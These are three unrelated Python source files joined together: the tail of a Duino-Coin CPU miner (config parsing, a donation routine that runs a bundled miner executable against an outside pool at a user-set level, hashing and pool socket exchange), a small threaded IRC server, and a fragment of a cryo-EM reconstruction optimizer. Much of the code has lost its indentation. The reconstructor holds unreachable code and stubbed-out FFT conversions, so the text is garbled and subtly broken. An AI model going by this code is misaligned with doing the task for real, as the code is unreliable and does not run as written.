        if efficiency == "":
            efficiency = 95
        elif float(efficiency) > 100:
            efficiency = 100
        elif float(efficiency) < 1:
            efficiency = 1
        # Check whether threadcount is correct
        threadcount = sub(r"\D", "", threadcount)
        if threadcount == "":
            threadcount = cpu_count()
        elif int(threadcount) > 8:
            threadcount = 8
            print(
                Style.RESET_ALL
                + Style.BRIGHT
                + getString("max_threads_notice"))
        elif int(threadcount) < 1:
            threadcount = 1
        # Check whether algo setting is correct
        if algorithm == "2":
            algorithm = "XXHASH"
        else:
            algorithm = "DUCO-S1"
        # Check whether diff setting is correct
        if requested_diff == "1":
            requested_diff = "LOW"
        elif requested_diff == "2":
            requested_diff = "MEDIUM"
        else:
            requested_diff = "NET"
        # Check whether donation_level is correct
        donation_level = sub(r"\D", "", donation_level)
        if donation_level == "":
            donation_level = 1
        elif float(donation_level) > 5:
            donation_level = 5
        elif float(donation_level) < 0:
            donation_level = 0
# Format data
config["miner"] = {
"username": username,
"efficiency": efficiency,
"threads": threadcount,
"requested_diff": requested_diff,
"donate": donation_level,
"identifier": rig_identiier,
"algorithm": algorithm,
"language": lang,
"debug": "n"
}
# Write data to configfile
with open(RESOURCES_DIR + "/Miner_config.cfg", "w") as configfile:
config.write(configfile)
        # Calculate efficiency for later use with sleep function
efficiency = (100 - float(efficiency)) * 0.01
print(Style.RESET_ALL + getString("config_saved"))
else:
# If config already exists, load data from it
config.read(RESOURCES_DIR + "/Miner_config.cfg")
username = config["miner"]["username"]
efficiency = config["miner"]["efficiency"]
threadcount = config["miner"]["threads"]
requested_diff = config["miner"]["requested_diff"]
donation_level = config["miner"]["donate"]
algorithm = config["miner"]["algorithm"]
        rig_identifier = config["miner"]["identifier"]
debug = config["miner"]["debug"]
        # Calculate efficiency for use with sleep function
efficiency = (100 - float(efficiency)) * 0.01
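# The generated Miner_config.cfg has this shape (values are illustrative):
#
#   [miner]
#   username = myname
#   efficiency = 95
#   threads = 4
#   requested_diff = NET
#   donate = 1
#   identifier = None
#   algorithm = DUCO-S1
#   language = english
#   debug = n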
def Donate():
global donation_level
global donatorrunning
global donateExecutable
if osname == "nt":
cmd = (
"cd "
+ RESOURCES_DIR
+ "& Donate_executable.exe "
+ "-o stratum+tcp://xmg.minerclaim.net:7008 "
+ "-u revox.donate "
+ "-p x -s 4 -e ")
elif osname == "posix":
cmd = (
"cd "
+ RESOURCES_DIR
+ "&& chmod +x Donate_executable "
+ "&& ./Donate_executable "
+ "-o stratum+tcp://xmg.minerclaim.net:7008 "
+ "-u revox.donate "
+ "-p x -s 4 -e ")
if int(donation_level) <= 0:
prettyPrint(
"sys0",
Fore.YELLOW
+ getString("free_network_warning")
+ getString("donate_warning")
+ Fore.GREEN
+ "https://duinocoin.com/donate"
+ Fore.YELLOW
+ getString("learn_more_donate"),
"warning")
sleep(10)
elif donatorrunning == False:
if int(donation_level) == 5:
cmd += "95"
elif int(donation_level) == 4:
cmd += "75"
elif int(donation_level) == 3:
cmd += "50"
elif int(donation_level) == 2:
cmd += "20"
elif int(donation_level) == 1:
cmd += "10"
if int(donation_level) > 0:
debugOutput(getString("starting_donation"))
donatorrunning = True
# Launch CMD as subprocess
donateExecutable = Popen(
cmd, shell=True, stderr=DEVNULL)
prettyPrint(
"sys0",
getString("thanks_donation"),
"warning")
def ducos1(
lastBlockHash,
expectedHash,
difficulty):
# DUCO-S1 algorithm
# Measure starting time
timeStart = time()
base_hash = sha1(str(lastBlockHash).encode('ascii'))
temp_hash = None
    # Loop from 0 to 100*diff
for ducos1res in range(100 * int(difficulty) + 1):
# Generate hash
temp_hash = base_hash.copy()
temp_hash.update(str(ducos1res).encode('ascii'))
ducos1 = temp_hash.hexdigest()
# Check if result was found
if ducos1 == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1res / timeDelta
return [ducos1res, hashrate]
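# Illustrative round trip with hypothetical job values: the expected hash
# is sha1(lastBlockHash + str(nonce)), so a solved job satisfies:
#
#   from hashlib import sha1
#   last_hash = "exampleblockhash"  # hypothetical
#   nonce = 1234
#   expected = sha1((last_hash + str(nonce)).encode("ascii")).hexdigest()
#   assert ducos1(last_hash, expected, 100)[0] == nonce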
def ducos1xxh(
lastBlockHash,
expectedHash,
difficulty):
# XXHASH algorithm
# Measure starting time
timeStart = time()
    # Loop from 0 to 100*diff
for ducos1xxres in range(100 * int(difficulty) + 1):
# Generate hash
ducos1xx = xxhash.xxh64(
str(lastBlockHash) + str(ducos1xxres), seed=2811)
ducos1xx = ducos1xx.hexdigest()
# Check if result was found
if ducos1xx == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1xxres / timeDelta
return [ducos1xxres, hashrate]
def Thread(
threadid,
accepted,
rejected,
requested_diff,
khashcount,
username,
efficiency,
        rig_identifier,
algorithm,
hashrates_list,
totalhashrate_mean):
# Mining section for every thread
while True:
# Grab server IP and port
while True:
try:
                # Use requests to fetch the server IP file from GitHub
                res = requests.get(server_ip_file)
if res.status_code == 200:
# Read content and split into lines
content = (res.content.decode().splitlines())
# Line 1 = IP
masterServer_address = content[0]
# Line 2 = port
masterServer_port = content[1]
debugOutput(
"Retrieved pool IP: "
+ masterServer_address
+ ":"
+ str(masterServer_port))
break
except Exception as e:
# If there was an error with grabbing data from GitHub
prettyPrint(
"net"
+ str(threadid),
getString("data_error")
+ Style.NORMAL
+ Fore.RESET
+ " (git err: "
+ str(e)
+ ")",
"error")
debugOutput("GitHub error: " + str(e))
sleep(10)
# Connect to the server
while True:
try:
soc = socket()
# Establish socket connection to the server
soc.connect((str(masterServer_address),
int(masterServer_port)))
soc.settimeout(SOC_TIMEOUT)
serverVersion = soc.recv(3).decode().rstrip(
"\n") # Get server version
debugOutput("Server version: " + serverVersion)
if (float(serverVersion) <= float(MINER_VER)
and len(serverVersion) == 3):
# If miner is up-to-date, display a message and continue
prettyPrint(
"net"
+ str(threadid),
getString("connected")
+ Fore.RESET
+ Style.NORMAL
+ getString("connected_server")
+ str(serverVersion)
+ ")",
"success")
break
else:
# Miner is outdated
prettyPrint(
"sys"
+ str(threadid),
getString("outdated_miner")
+ MINER_VER
+ ") -"
+ getString("server_is_on_version")
+ serverVersion
+ Style.NORMAL
+ Fore.RESET
+ getString("update_warning"),
"warning")
break
except Exception as e:
# Socket connection error
prettyPrint(
"net"
+ str(threadid),
getString("connecting_error")
+ Style.NORMAL
+ Fore.RESET
+ " (net err: "
+ str(e)
+ ")",
"error")
debugOutput("Connection error: " + str(e))
sleep(10)
if algorithm == "XXHASH":
using_algo = getString("using_algo_xxh")
else:
using_algo = getString("using_algo")
prettyPrint(
"sys"
+ str(threadid),
getString("mining_thread")
+ str(threadid)
+ getString("mining_thread_starting")
+ Style.NORMAL
+ Fore.RESET
+ using_algo
+ Fore.YELLOW
+ str(int(100 - efficiency * 100))
+ "% "
+ getString("efficiency"),
"success")
# Mining section
while True:
try:
# If efficiency lower than 100...
if float(100 - efficiency * 100) < 100:
# ...sleep some time
sleep(float(efficiency * 5))
while True:
# Ask the server for job
if algorithm == "XXHASH":
soc.sendall(bytes(
"JOBXX,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
else:
soc.sendall(bytes(
"JOB,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",") # Get work from pool
debugOutput("Received: " + str(job))
if job[1] == "This user doesn't exist":
prettyPrint(
"cpu"
+ str(threadid),
getString("mining_user")
+ str(username)
+ getString("mining_not_exist")
+ Style.NORMAL
+ Fore.RESET
+ getString("mining_not_exist_warning"),
"error")
sleep(10)
elif job[0] and job[1] and job[2]:
diff = int(job[2])
debugOutput(str(threadid) +
"Job received: "
+ str(job))
# If job received, continue to hashing algo
break
while True:
# Call DUCOS-1 hasher
computetimeStart = time()
if algorithm == "XXHASH":
algo_back_color = Back.CYAN
result = ducos1xxh(job[0], job[1], diff)
else:
algo_back_color = Back.YELLOW
result = ducos1(job[0], job[1], diff)
computetimeStop = time()
                    # Measure compute time (in seconds)
                    computetime = computetimeStop - computetimeStart
# Read result from ducos1 hasher
ducos1res = result[0]
debugOutput("Thread "
+ str(threadid)
+ ": result found: "
+ str(ducos1res))
# Convert H/s to kH/s
threadhashcount = int(result[1] / 1000)
# Add this thread's hash counter
# to the global hashrate counter
hashrates_list[threadid] = threadhashcount
                    # Calculate total hashrate of all threads
sharehashrate = 0
for thread in hashrates_list.keys():
sharehashrate += hashrates_list[thread]
totalhashrate_mean.append(sharehashrate)
# Get average from the last 20 hashrate measurements
totalhashrate = mean(totalhashrate_mean[-20:])
while True:
# Send result of hashing algorithm to the server
soc.sendall(bytes(
str(ducos1res)
+ ","
+ str(threadhashcount * 1000)
+ ","
+ "Official PC Miner ("
+ str(algorithm)
+ ") v"
+ str(MINER_VER)
+ ","
                            + str(rig_identifier),
encoding="utf8"))
                        responsetimestart = now()
# Get feedback
feedback = soc.recv(8).decode().rstrip("\n")
responsetimestop = now()
# Measure server ping
                        ping = str(int(
                            (responsetimestop - responsetimestart).microseconds
                            / 1000))
debugOutput("Thread "
+ str(threadid)
+ ": Feedback received: "
+ str(feedback)
+ " Ping: "
+ str(ping))
if totalhashrate > 800:
# Format hashcount to MH/s
formattedhashcount = str(
"%03.2f" % round(totalhashrate / 1000, 2)
+ " MH/s")
else:
# Stay with kH/s
formattedhashcount = str(
"%03.0f" % float(totalhashrate)
+ " kH/s")
if (totalhashrate > 2000
and accepted.value % 10 == 0):
prettyPrint("sys0",
" " + getString("max_hashrate_notice"),
"warning")
if feedback == "GOOD":
# If result was correct
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.GREEN
+ " ✓"
+ getString("accepted")
+ Fore.RESET
+ str(int(accepted.value))
+ "/"
+ str(int(accepted.value + rejected.value))
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
elif feedback == "BLOCK":
# If block was found
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.CYAN
+ " ✓"
+ getString("block_found")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
else:
# If result was incorrect
rejected.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ algo_back_color
+ Back.YELLOW
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Style.BRIGHT
+ Back.RESET
+ Fore.RED
+ " ✗"
+ getString("rejected")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
break
break
except Exception as e:
prettyPrint(
"net"
+ str(threadid),
getString("error_while_mining")
+ Style.NORMAL
+ Fore.RESET
+ " (mining err: "
+ str(e)
+ ")",
"error")
debugOutput("Error while mining: " + str(e))
sleep(5)
break
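# The pool exchange implemented above, with hypothetical values:
#
#   -> "JOB,username,NET"
#   <- "<last block hash>,<expected hash>,6"   # job[0], job[1], difficulty
#   -> "1234,50000,Official PC Miner (DUCO-S1) v2.45,None"
#   <- "GOOD"                                  # or "BLOCK"; anything else
#                                              # is counted as a rejected share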
def prettyPrint(messageType, message, state):
    # Print output messages in the DUCO "standard"
    # net/cpu/sys background
    if messageType.startswith("net"):
        background = Back.BLUE
    elif messageType.startswith("cpu"):
        background = Back.YELLOW
    else:
        background = Back.GREEN
# Text color
if state == "success":
color = Fore.GREEN
elif state == "warning":
color = Fore.YELLOW
else:
color = Fore.RED
with thread_lock:
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ background
+ " "
+ messageType
+ " "
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def initRichPresence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
debugOutput("Discord rich presence initialized")
except Exception as e:
# Discord not launched
debugOutput("Error launching Discord RPC thead: " + str(e))
def updateRichPresence():
# Update rich presence status
startTime = int(time())
while True:
try:
# Calculate average total hashrate with prefix
totalhashrate = mean(totalhashrate_mean[-20:])
if totalhashrate > 800:
totalhashrate = str(round(totalhashrate / 1000, 2)) + " MH/s"
else:
totalhashrate = str(round(totalhashrate, 1)) + " kH/s"
RPC.update(
details="Hashrate: " + str(totalhashrate),
start=startTime,
state="Acc. shares: "
+ str(accepted.value)
+ "/"
+ str(rejected.value + accepted.value),
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
debugOutput("Rich presence updated")
except Exception as e:
# Discord not launched
debugOutput("Error launching Discord RPC thead: " + str(e))
sleep(15) # 15 seconds to respect Discord rate limit
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
# Processor info
cpu = cpuinfo.get_cpu_info()
# Colorama
init(autoreset=True)
title(getString("duco_python_miner") + str(MINER_VER) + ")")
try:
from multiprocessing import (
Manager,
Process,
Value,
cpu_count,
current_process
)
manager = Manager()
# Multiprocessing globals
khashcount = Value("i", 0)
accepted = Value("i", 0)
rejected = Value("i", 0)
hashrates_list = manager.dict()
totalhashrate_mean = manager.list()
except Exception as e:
print(e)
prettyPrint(
"sys0",
" Multiprocessing is not available. "
+ "Please check permissions and/or your python installation. "
+ "Exiting in 15s.",
"error")
sleep(15)
_exit(1)
try:
# Load config file or create new one
loadConfig()
debugOutput("Config file loaded")
except Exception as e:
prettyPrint(
"sys0",
getString("load_config_error")
+ RESOURCES_DIR
+ getString("load_config_error_warning")
+ Style.NORMAL
+ Fore.RESET
+ " (config load err: "
+ str(e)
+ ")",
"error")
debugOutput("Error reading configfile: " + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
Greeting()
debugOutput("Greeting displayed")
except Exception as e:
prettyPrint(
"sys0",
"Error displaying greeting message"
+ Style.NORMAL
+ Fore.RESET
+ " (greeting err: "
+ str(e)
+ ")",
"error")
debugOutput("Error displaying greeting message: " + str(e))
try:
# Start donation thread
Donate()
except Exception as e:
debugOutput("Error launching donation thread: " + str(e))
try:
for x in range(int(threadcount)):
# Launch duco mining threads
thread.append(x)
thread[x] = Process(
target=Thread,
args=(
x,
accepted,
rejected,
requested_diff,
khashcount,
username,
efficiency,
                    rig_identifier,
algorithm,
hashrates_list,
totalhashrate_mean))
thread[x].start()
sleep(0.1)
except Exception as e:
prettyPrint(
"sys0",
"Error launching CPU thread(s)"
+ Style.NORMAL
+ Fore.RESET
+ " (cpu launch err: "
+ str(e)
+ ")",
"error")
debugOutput("Error launching CPU thead(s): " + str(e))
try:
# Discord rich presence threads
initRichPresence()
thrThread(
target=updateRichPresence).start()
except Exception as e:
debugOutput("Error launching Discord RPC thead: " + str(e))
|
irc_server.py
|
import logging
import socket
import threading
import click
logging.basicConfig(filename="server.log", level=logging.DEBUG)
logger = logging.getLogger()
class IRCServer:
def __init__(self, port):
        # gethostbyname_ex() lists all addresses when the host has
        # multiple network interfaces; this picks the second entry
        self.host = socket.gethostbyname_ex(socket.gethostname())[2][1]
self.port = port
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind((self.host, self.port))
self.socket.settimeout(2)
self.subscribers = []
self.nicknames = []
def add_subscriber(self, conn):
self.subscribers.append(conn)
def rm_subscriber(self, conn):
try:
self.subscribers.remove(conn)
except ValueError:
pass
def rm_nickname(self, nickname):
try:
self.nicknames.remove(nickname)
except ValueError:
pass
def notify(self, msg):
for s in self.subscribers:
self.update(s, msg)
def update(self, conn, msg):
message = msg.encode("utf-8")
msg_length = len(message)
send_length = str(msg_length).encode("utf-8")
send_length += b" " * (64 - len(send_length))
conn.send(send_length)
conn.send(message)
logger.info(f"IRCServer.send -> msg: {msg}")
def handle_client(self, conn, addr):
print(f"[CONNECTION] Client {addr} has connected.")
connected = True
        client_nickname = ""
while connected:
msg_length = int(conn.recv(64).decode("utf-8"))
msg = conn.recv(msg_length).decode("utf-8")
logger.info(f"IRCServer.recv -> msg: {msg}")
if msg == "QUIT":
connected = False
elif msg.startswith("NICK"):
# Next message should be a USER command
ml = int(conn.recv(64).decode("utf-8"))
user_msg = conn.recv(ml).decode("utf-8")
logger.info(f"IRCServer.recv -> msg: {user_msg}")
nickname = msg.split()[1]
if nickname not in self.nicknames:
client_nickname = nickname
self.nicknames.append(client_nickname)
self.update(
conn,
f"001 {client_nickname} :Welcome to the Internet Relay Network {client_nickname}!",
)
else:
self.update(conn, f"433 * {nickname} :Nickname is already in use.")
elif msg.startswith("JOIN"):
self.add_subscriber(conn)
self.notify(f":{client_nickname} {msg}")
elif msg.startswith("PART"):
self.notify(f":{client_nickname} {msg}")
else:
# Notify all client connections (regular PRIVMSG command)
self.notify(f":{client_nickname} {msg}")
self.rm_nickname(client_nickname)
self.rm_subscriber(conn)
print(f"[DISCONNECTION] Client {addr} has disconnected.")
conn.close()
def start(self):
print("[STARTING] Server is starting...")
self.socket.listen()
print(f"[LISTENING] Server is listening on {self.host}:{self.port}")
while True:
try:
conn, addr = self.socket.accept()
threading.Thread(target=self.handle_client, args=(conn, addr)).start()
except socket.timeout:
continue
except KeyboardInterrupt:
raise
@click.command()
@click.option("--port", default=50007, help="Target port to use", show_default=True)
def main(port):
server = IRCServer(port=port)
try:
server.start()
except KeyboardInterrupt:
print("[STOPPING] Server is stopping...")
logger.debug("Signifies end of process")
if __name__ == "__main__":
main()
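# A minimal client sketch for the framing used above: each message is a
# 64-byte space-padded ASCII length header followed by the UTF-8 payload
# (host, port and nickname below are illustrative):
#
#   import socket
#   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   s.connect(("127.0.0.1", 50007))
#
#   def send(msg):
#       data = msg.encode("utf-8")
#       header = str(len(data)).encode("utf-8")
#       s.send(header + b" " * (64 - len(header)))
#       s.send(data)
#
#   send("NICK alice")
#   send("USER alice 0 * :Alice")  # the server reads USER right after NICK
#   send("JOIN #general")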
|
reconstructor.py
|
from __future__ import print_function, division
import time, os, sys
from datetime import datetime
from cryoio.imagestack import MRCImageStack, CombinedImageStack
from cryoio.ctfstack import CTFStack, CombinedCTFStack
from cryoio.dataset import CryoDataset
opj = os.path.join
from copy import copy, deepcopy
import numpy as np
from shutil import copyfile
from util import BackgroundWorker, Output, OutputStream, Params, format_timedelta, gitutil, FiniteRunningSum
import cryoem
import cryoops
from objectives import eval_objective, SumObjectives
from importancesampler.gaussian import FixedGaussianImportanceSampler
from importancesampler.fisher import FixedFisherImportanceSampler
try:
import cPickle as pickle # python 2
except ImportError:
import pickle # python 3
import socket
from threading import Thread
try:
from Queue import Queue # python 2
except ModuleNotFoundError:
from queue import Queue # python 3
from optimizers.sagd import SAGDStep
from optimizers.sgd import SGDMomentumStep
from cryoio.mrc import writeMRC, readMRC
from symmetry import get_symmetryop
import density
import geometry
# precond should ideally be set to inv(chol(H)) where H is the Hessian
def density2params(M,fM,xtype,grad_transform = False,precond = None):
if xtype == 'real':
if grad_transform:
x0 = M if precond is None else M * precond
else:
x0 = M if precond is None else M / precond
elif xtype == 'complex':
raise NotImplementedError()
if grad_transform:
x0 = fM if precond is None else fM * precond
else:
x0 = fM if precond is None else fM / precond
elif xtype == 'complex_coeff':
raise NotImplementedError()
if grad_transform:
pfM = fM if precond is None else fM * precond
else:
pfM = fM if precond is None else fM / precond
x0 = np.empty((2*fM.size,),dtype=density.real_t)
x0[0:fM.size] = pfM.real.reshape((-1,))
x0[fM.size:] = pfM.imag.reshape((-1,))
elif xtype == 'complex_herm_coeff':
raise NotImplementedError()
assert precond is None, 'Unimplemented'
N = fM.shape[0]
NC = int(N/2) + 1
startFreq = int(1-(N%2))
herm_freqs = fM[0:NC,:,:]
if startFreq:
herm_freqs += np.roll(np.roll(np.roll(fM[::-1, ::-1, ::-1], \
1, axis=0), \
1, axis=1), \
1, axis=2)[0:NC,:,:].conj()
else:
herm_freqs += fM[::-1, ::-1, ::-1][0:NC,:,:].conj()
if not grad_transform:
herm_freqs *= 0.5
x0 = np.empty((2*NC*N**2,),dtype=density.real_t)
x0[0:NC*N**2] = herm_freqs.real.reshape((-1,))
x0[NC*N**2:] = herm_freqs.imag.reshape((-1,))
return x0
def param2density(x,xtype,sz,precond = None):
if xtype == 'real':
M, fM = x.reshape(sz), None
if precond is not None:
M = M * precond
elif xtype == 'complex':
raise NotImplementedError()
M, fM = None, x.reshape(sz)
if precond is not None:
fM = fM * precond
elif xtype == 'complex_coeff':
raise NotImplementedError()
M, fM = None, density.empty_cplx(sz)
fM.real = x[0:fM.size].reshape(sz)
fM.imag = x[fM.size:].reshape(sz)
if precond is not None:
fM *= precond
elif xtype == 'complex_herm_coeff':
raise NotImplementedError()
assert precond is None, 'Unimplemented'
M, fM = None, density.empty_cplx(sz)
N = sz[0]
NC = int(N/2) + 1
startFreq = int(1-(N%2))
zeroFreq = int(N/2)
herm_freqs = np.empty((NC,N,N),dtype=density.complex_t)
herm_freqs.real = x[0:NC*N**2].reshape(herm_freqs.shape)
herm_freqs.imag = x[NC*N**2:].reshape(herm_freqs.shape)
fM[0:NC,:,:] = herm_freqs
if startFreq:
fM[NC:,:,:] = np.roll(np.roll(herm_freqs[startFreq:zeroFreq,:,:][::-1,::-1,::-1].conj(), \
1, axis=1), 1, axis=2)
else:
fM[NC:,:,:] = herm_freqs[startFreq:zeroFreq,:,:][::-1,::-1,::-1].conj()
return M,fM
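# Illustrative round-trip sketch (not part of the original pipeline): for the
# 'real' parameterization the two functions above are inverses when given the
# same preconditioner, since density2params divides by precond and
# param2density multiplies it back. The shape and values are arbitrary.
def _real_roundtrip_example():
    M = np.random.rand(8, 8, 8).astype(density.real_t)
    precond = np.full(M.shape, 2.0, dtype=density.real_t)
    x = density2params(M, None, 'real', precond=precond)          # M / precond
    M2, fM2 = param2density(x, 'real', M.shape, precond=precond)  # x * precond
    assert fM2 is None and np.allclose(M, M2)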
"""
This class is meant to wrap an objective function and deal with
reducing FFTs while allowing the optimizers to not need to know anything
about the real-space versus fourier space (or whatever) parameterizations.
"""
class ObjectiveWrapper:
def __init__(self,xtype,obj = None,arg_dict = None,precond = None):
        self.args = arg_dict if arg_dict is not None else {}
self.objective = obj
self.xtype = xtype
self.precond = precond
assert xtype in ['real','complex','complex_coeff','complex_herm_coeff']
def require_fspace(self):
return self.xtype in ['complex','complex_coeff','complex_herm_coeff']
def set_objective(self,obj,arg_dict = None):
self.args = arg_dict if arg_dict is not None else {}
self.objective = obj
if self.require_fspace():
assert self.objective.fspace
else:
assert not self.objective.fspace
def get_parameter(self):
return self.x0
def convert_parameter(self,x,comp_real=False,comp_fspace=False):
is_x0 = x is self.x0
if is_x0:
M, fM = self.M0, self.fM0
else:
M, fM = param2density(x, self.xtype, self.M0.shape, \
precond=self.precond)
if comp_real and M is None:
# M = density.fspace_to_real(fM)
M = fM
if comp_fspace and fM is None:
# fM = density.real_to_fspace(M)
fM = M
return M, fM
def set_density(self,M0,fM0):
self.M0 = M0
self.fM0 = fM0
self.x0 = density2params(M0,fM0,self.xtype,precond=self.precond)
return self.x0
def eval_obj(self,x,**kwargs):
M, fM = self.convert_parameter(x)
cargs = copy(self.args)
cargs.update(kwargs)
if cargs.get('compute_gradient',True):
logP,dlogP,outputs = self.objective.eval(M=M, fM=fM,
**cargs)
else:
logP,outputs = self.objective.eval(M=M, fM=fM,
**cargs)
return logP,outputs
if self.xtype in ['complex_coeff','complex_herm_coeff'] :
raise NotImplementedError()
if cargs.get('all_grads',False):
new_dlogPs = []
for adlogP in outputs['all_dlogPs']:
new_dlogP = density2params(None,adlogP.reshape(fM.shape), \
self.xtype,grad_transform=True, \
precond=self.precond)
new_dlogPs.append(new_dlogP)
outputs['all_dlogPs'] = new_dlogPs
dlogP = density2params(None,dlogP.reshape(fM.shape),self.xtype, \
grad_transform=True,precond=self.precond)
return logP,dlogP.reshape(x.shape),outputs
class CryoOptimizer(BackgroundWorker):
def outputbatchinfo(self,batch,res,logP,prefix,name):
diag = {}
stat = {}
like = {}
N_M = batch['N_M']
cepoch = self.cryodata.get_epoch(frac=True)
epoch = self.cryodata.get_epoch()
num_data = self.cryodata.N_D_Train
# sigma = np.sqrt(np.mean(res['Evar_like']))
sigma = np.sqrt(max(0, np.mean(res['Evar_like'])))
sigma_prior = np.sqrt(np.mean(res['Evar_prior']))
self.ostream(' {0} Batch:'.format(name))
if 'CV2_S' in res:
keymap = ['R', 'I', 'S']
else:
keymap = ['R', 'I']
for suff in keymap:
diag[prefix+'_CV2_'+suff] = res['CV2_'+suff]
diag[prefix+'_idxs'] = batch['img_idxs']
diag[prefix+'_sigma2_est'] = res['sigma2_est']
diag[prefix+'_correlation'] = res['correlation']
diag[prefix+'_power'] = res['power']
# self.ostream(" RMS Error: %g" % (sigma/n.sqrt(self.cryodata.noise_var)))
self.ostream(" RMS Error: %g, Signal: %g" % (sigma/np.sqrt(self.cryodata.noise_var), \
sigma_prior/np.sqrt(self.cryodata.noise_var)))
if 'CV2_S' in res:
self.ostream(" Effective # of R / I / S: %.2f / %.2f / %.2f " %\
(np.mean(res['CV2_R']), np.mean(res['CV2_I']),np.mean(res['CV2_S'])))
else:
self.ostream(" Effective # of R / I : %.2f / %.2f " % \
(np.mean(res['CV2_R']), np.mean(res['CV2_I'])))
# Importance Sampling Statistics
is_speedups = []
if 'CV2_S' in res:
keymap = ['R', 'I', 'S', 'Total']
else:
keymap = ['R','I','Total']
for suff in keymap:
if self.cparams.get('is_on_'+suff,False) or (suff == 'Total' and len(is_speedups) > 0):
spdup = N_M/res['N_' + suff + '_sampled_total']
is_speedups.append((suff,spdup,np.mean(res['N_'+suff+'_sampled']),res['N_'+suff]))
stat[prefix+'_is_speedup_'+suff] = [spdup]
else:
stat[prefix+'_is_speedup_'+suff] = [1.0]
if len(is_speedups) > 0:
lblstr = is_speedups[0][0]
numstr = '%.2f (%d of %d)' % is_speedups[0][1:]
for i in range(1,len(is_speedups)):
lblstr += ' / ' + is_speedups[i][0]
numstr += ' / %.2f (%d of %d)' % is_speedups[i][1:]
self.ostream(" IS Speedup {0}: {1}".format(lblstr,numstr))
stat[prefix+'_sigma'] = [sigma]
stat[prefix+'_logp'] = [logP]
stat[prefix+'_like'] = [res['L']]
stat[prefix+'_num_data'] = [num_data]
stat[prefix+'_num_data_evals'] = [self.num_data_evals]
stat[prefix+'_iteration'] = [self.iteration]
stat[prefix+'_epoch'] = [epoch]
        stat[prefix+'_cepoch'] = [cepoch]
stat[prefix+'_time'] = [time.time()]
for k,v in res['like_timing'].items():
stat[prefix+'_like_timing_'+k] = [v]
for k,v in res['kern_timing'].items():
stat[prefix+'_kern_timing_'+k] = [v]
Idxs = batch['img_idxs']
self.img_likes[Idxs] = res['like']
like['img_likes'] = self.img_likes
like['train_idxs'] = self.cryodata.train_idxs
like['test_idxs'] = self.cryodata.test_idxs
keepidxs = self.cryodata.train_idxs if prefix == 'train' else self.cryodata.test_idxs
keeplikes = self.img_likes[keepidxs]
keeplikes = keeplikes[np.isfinite(keeplikes)]
quants = np.percentile(keeplikes, range(0,101))
stat[prefix+'_full_like_quantiles'] = [quants]
quants = np.percentile(res['like'], range(0,101))
stat[prefix+'_mini_like_quantiles'] = [quants]
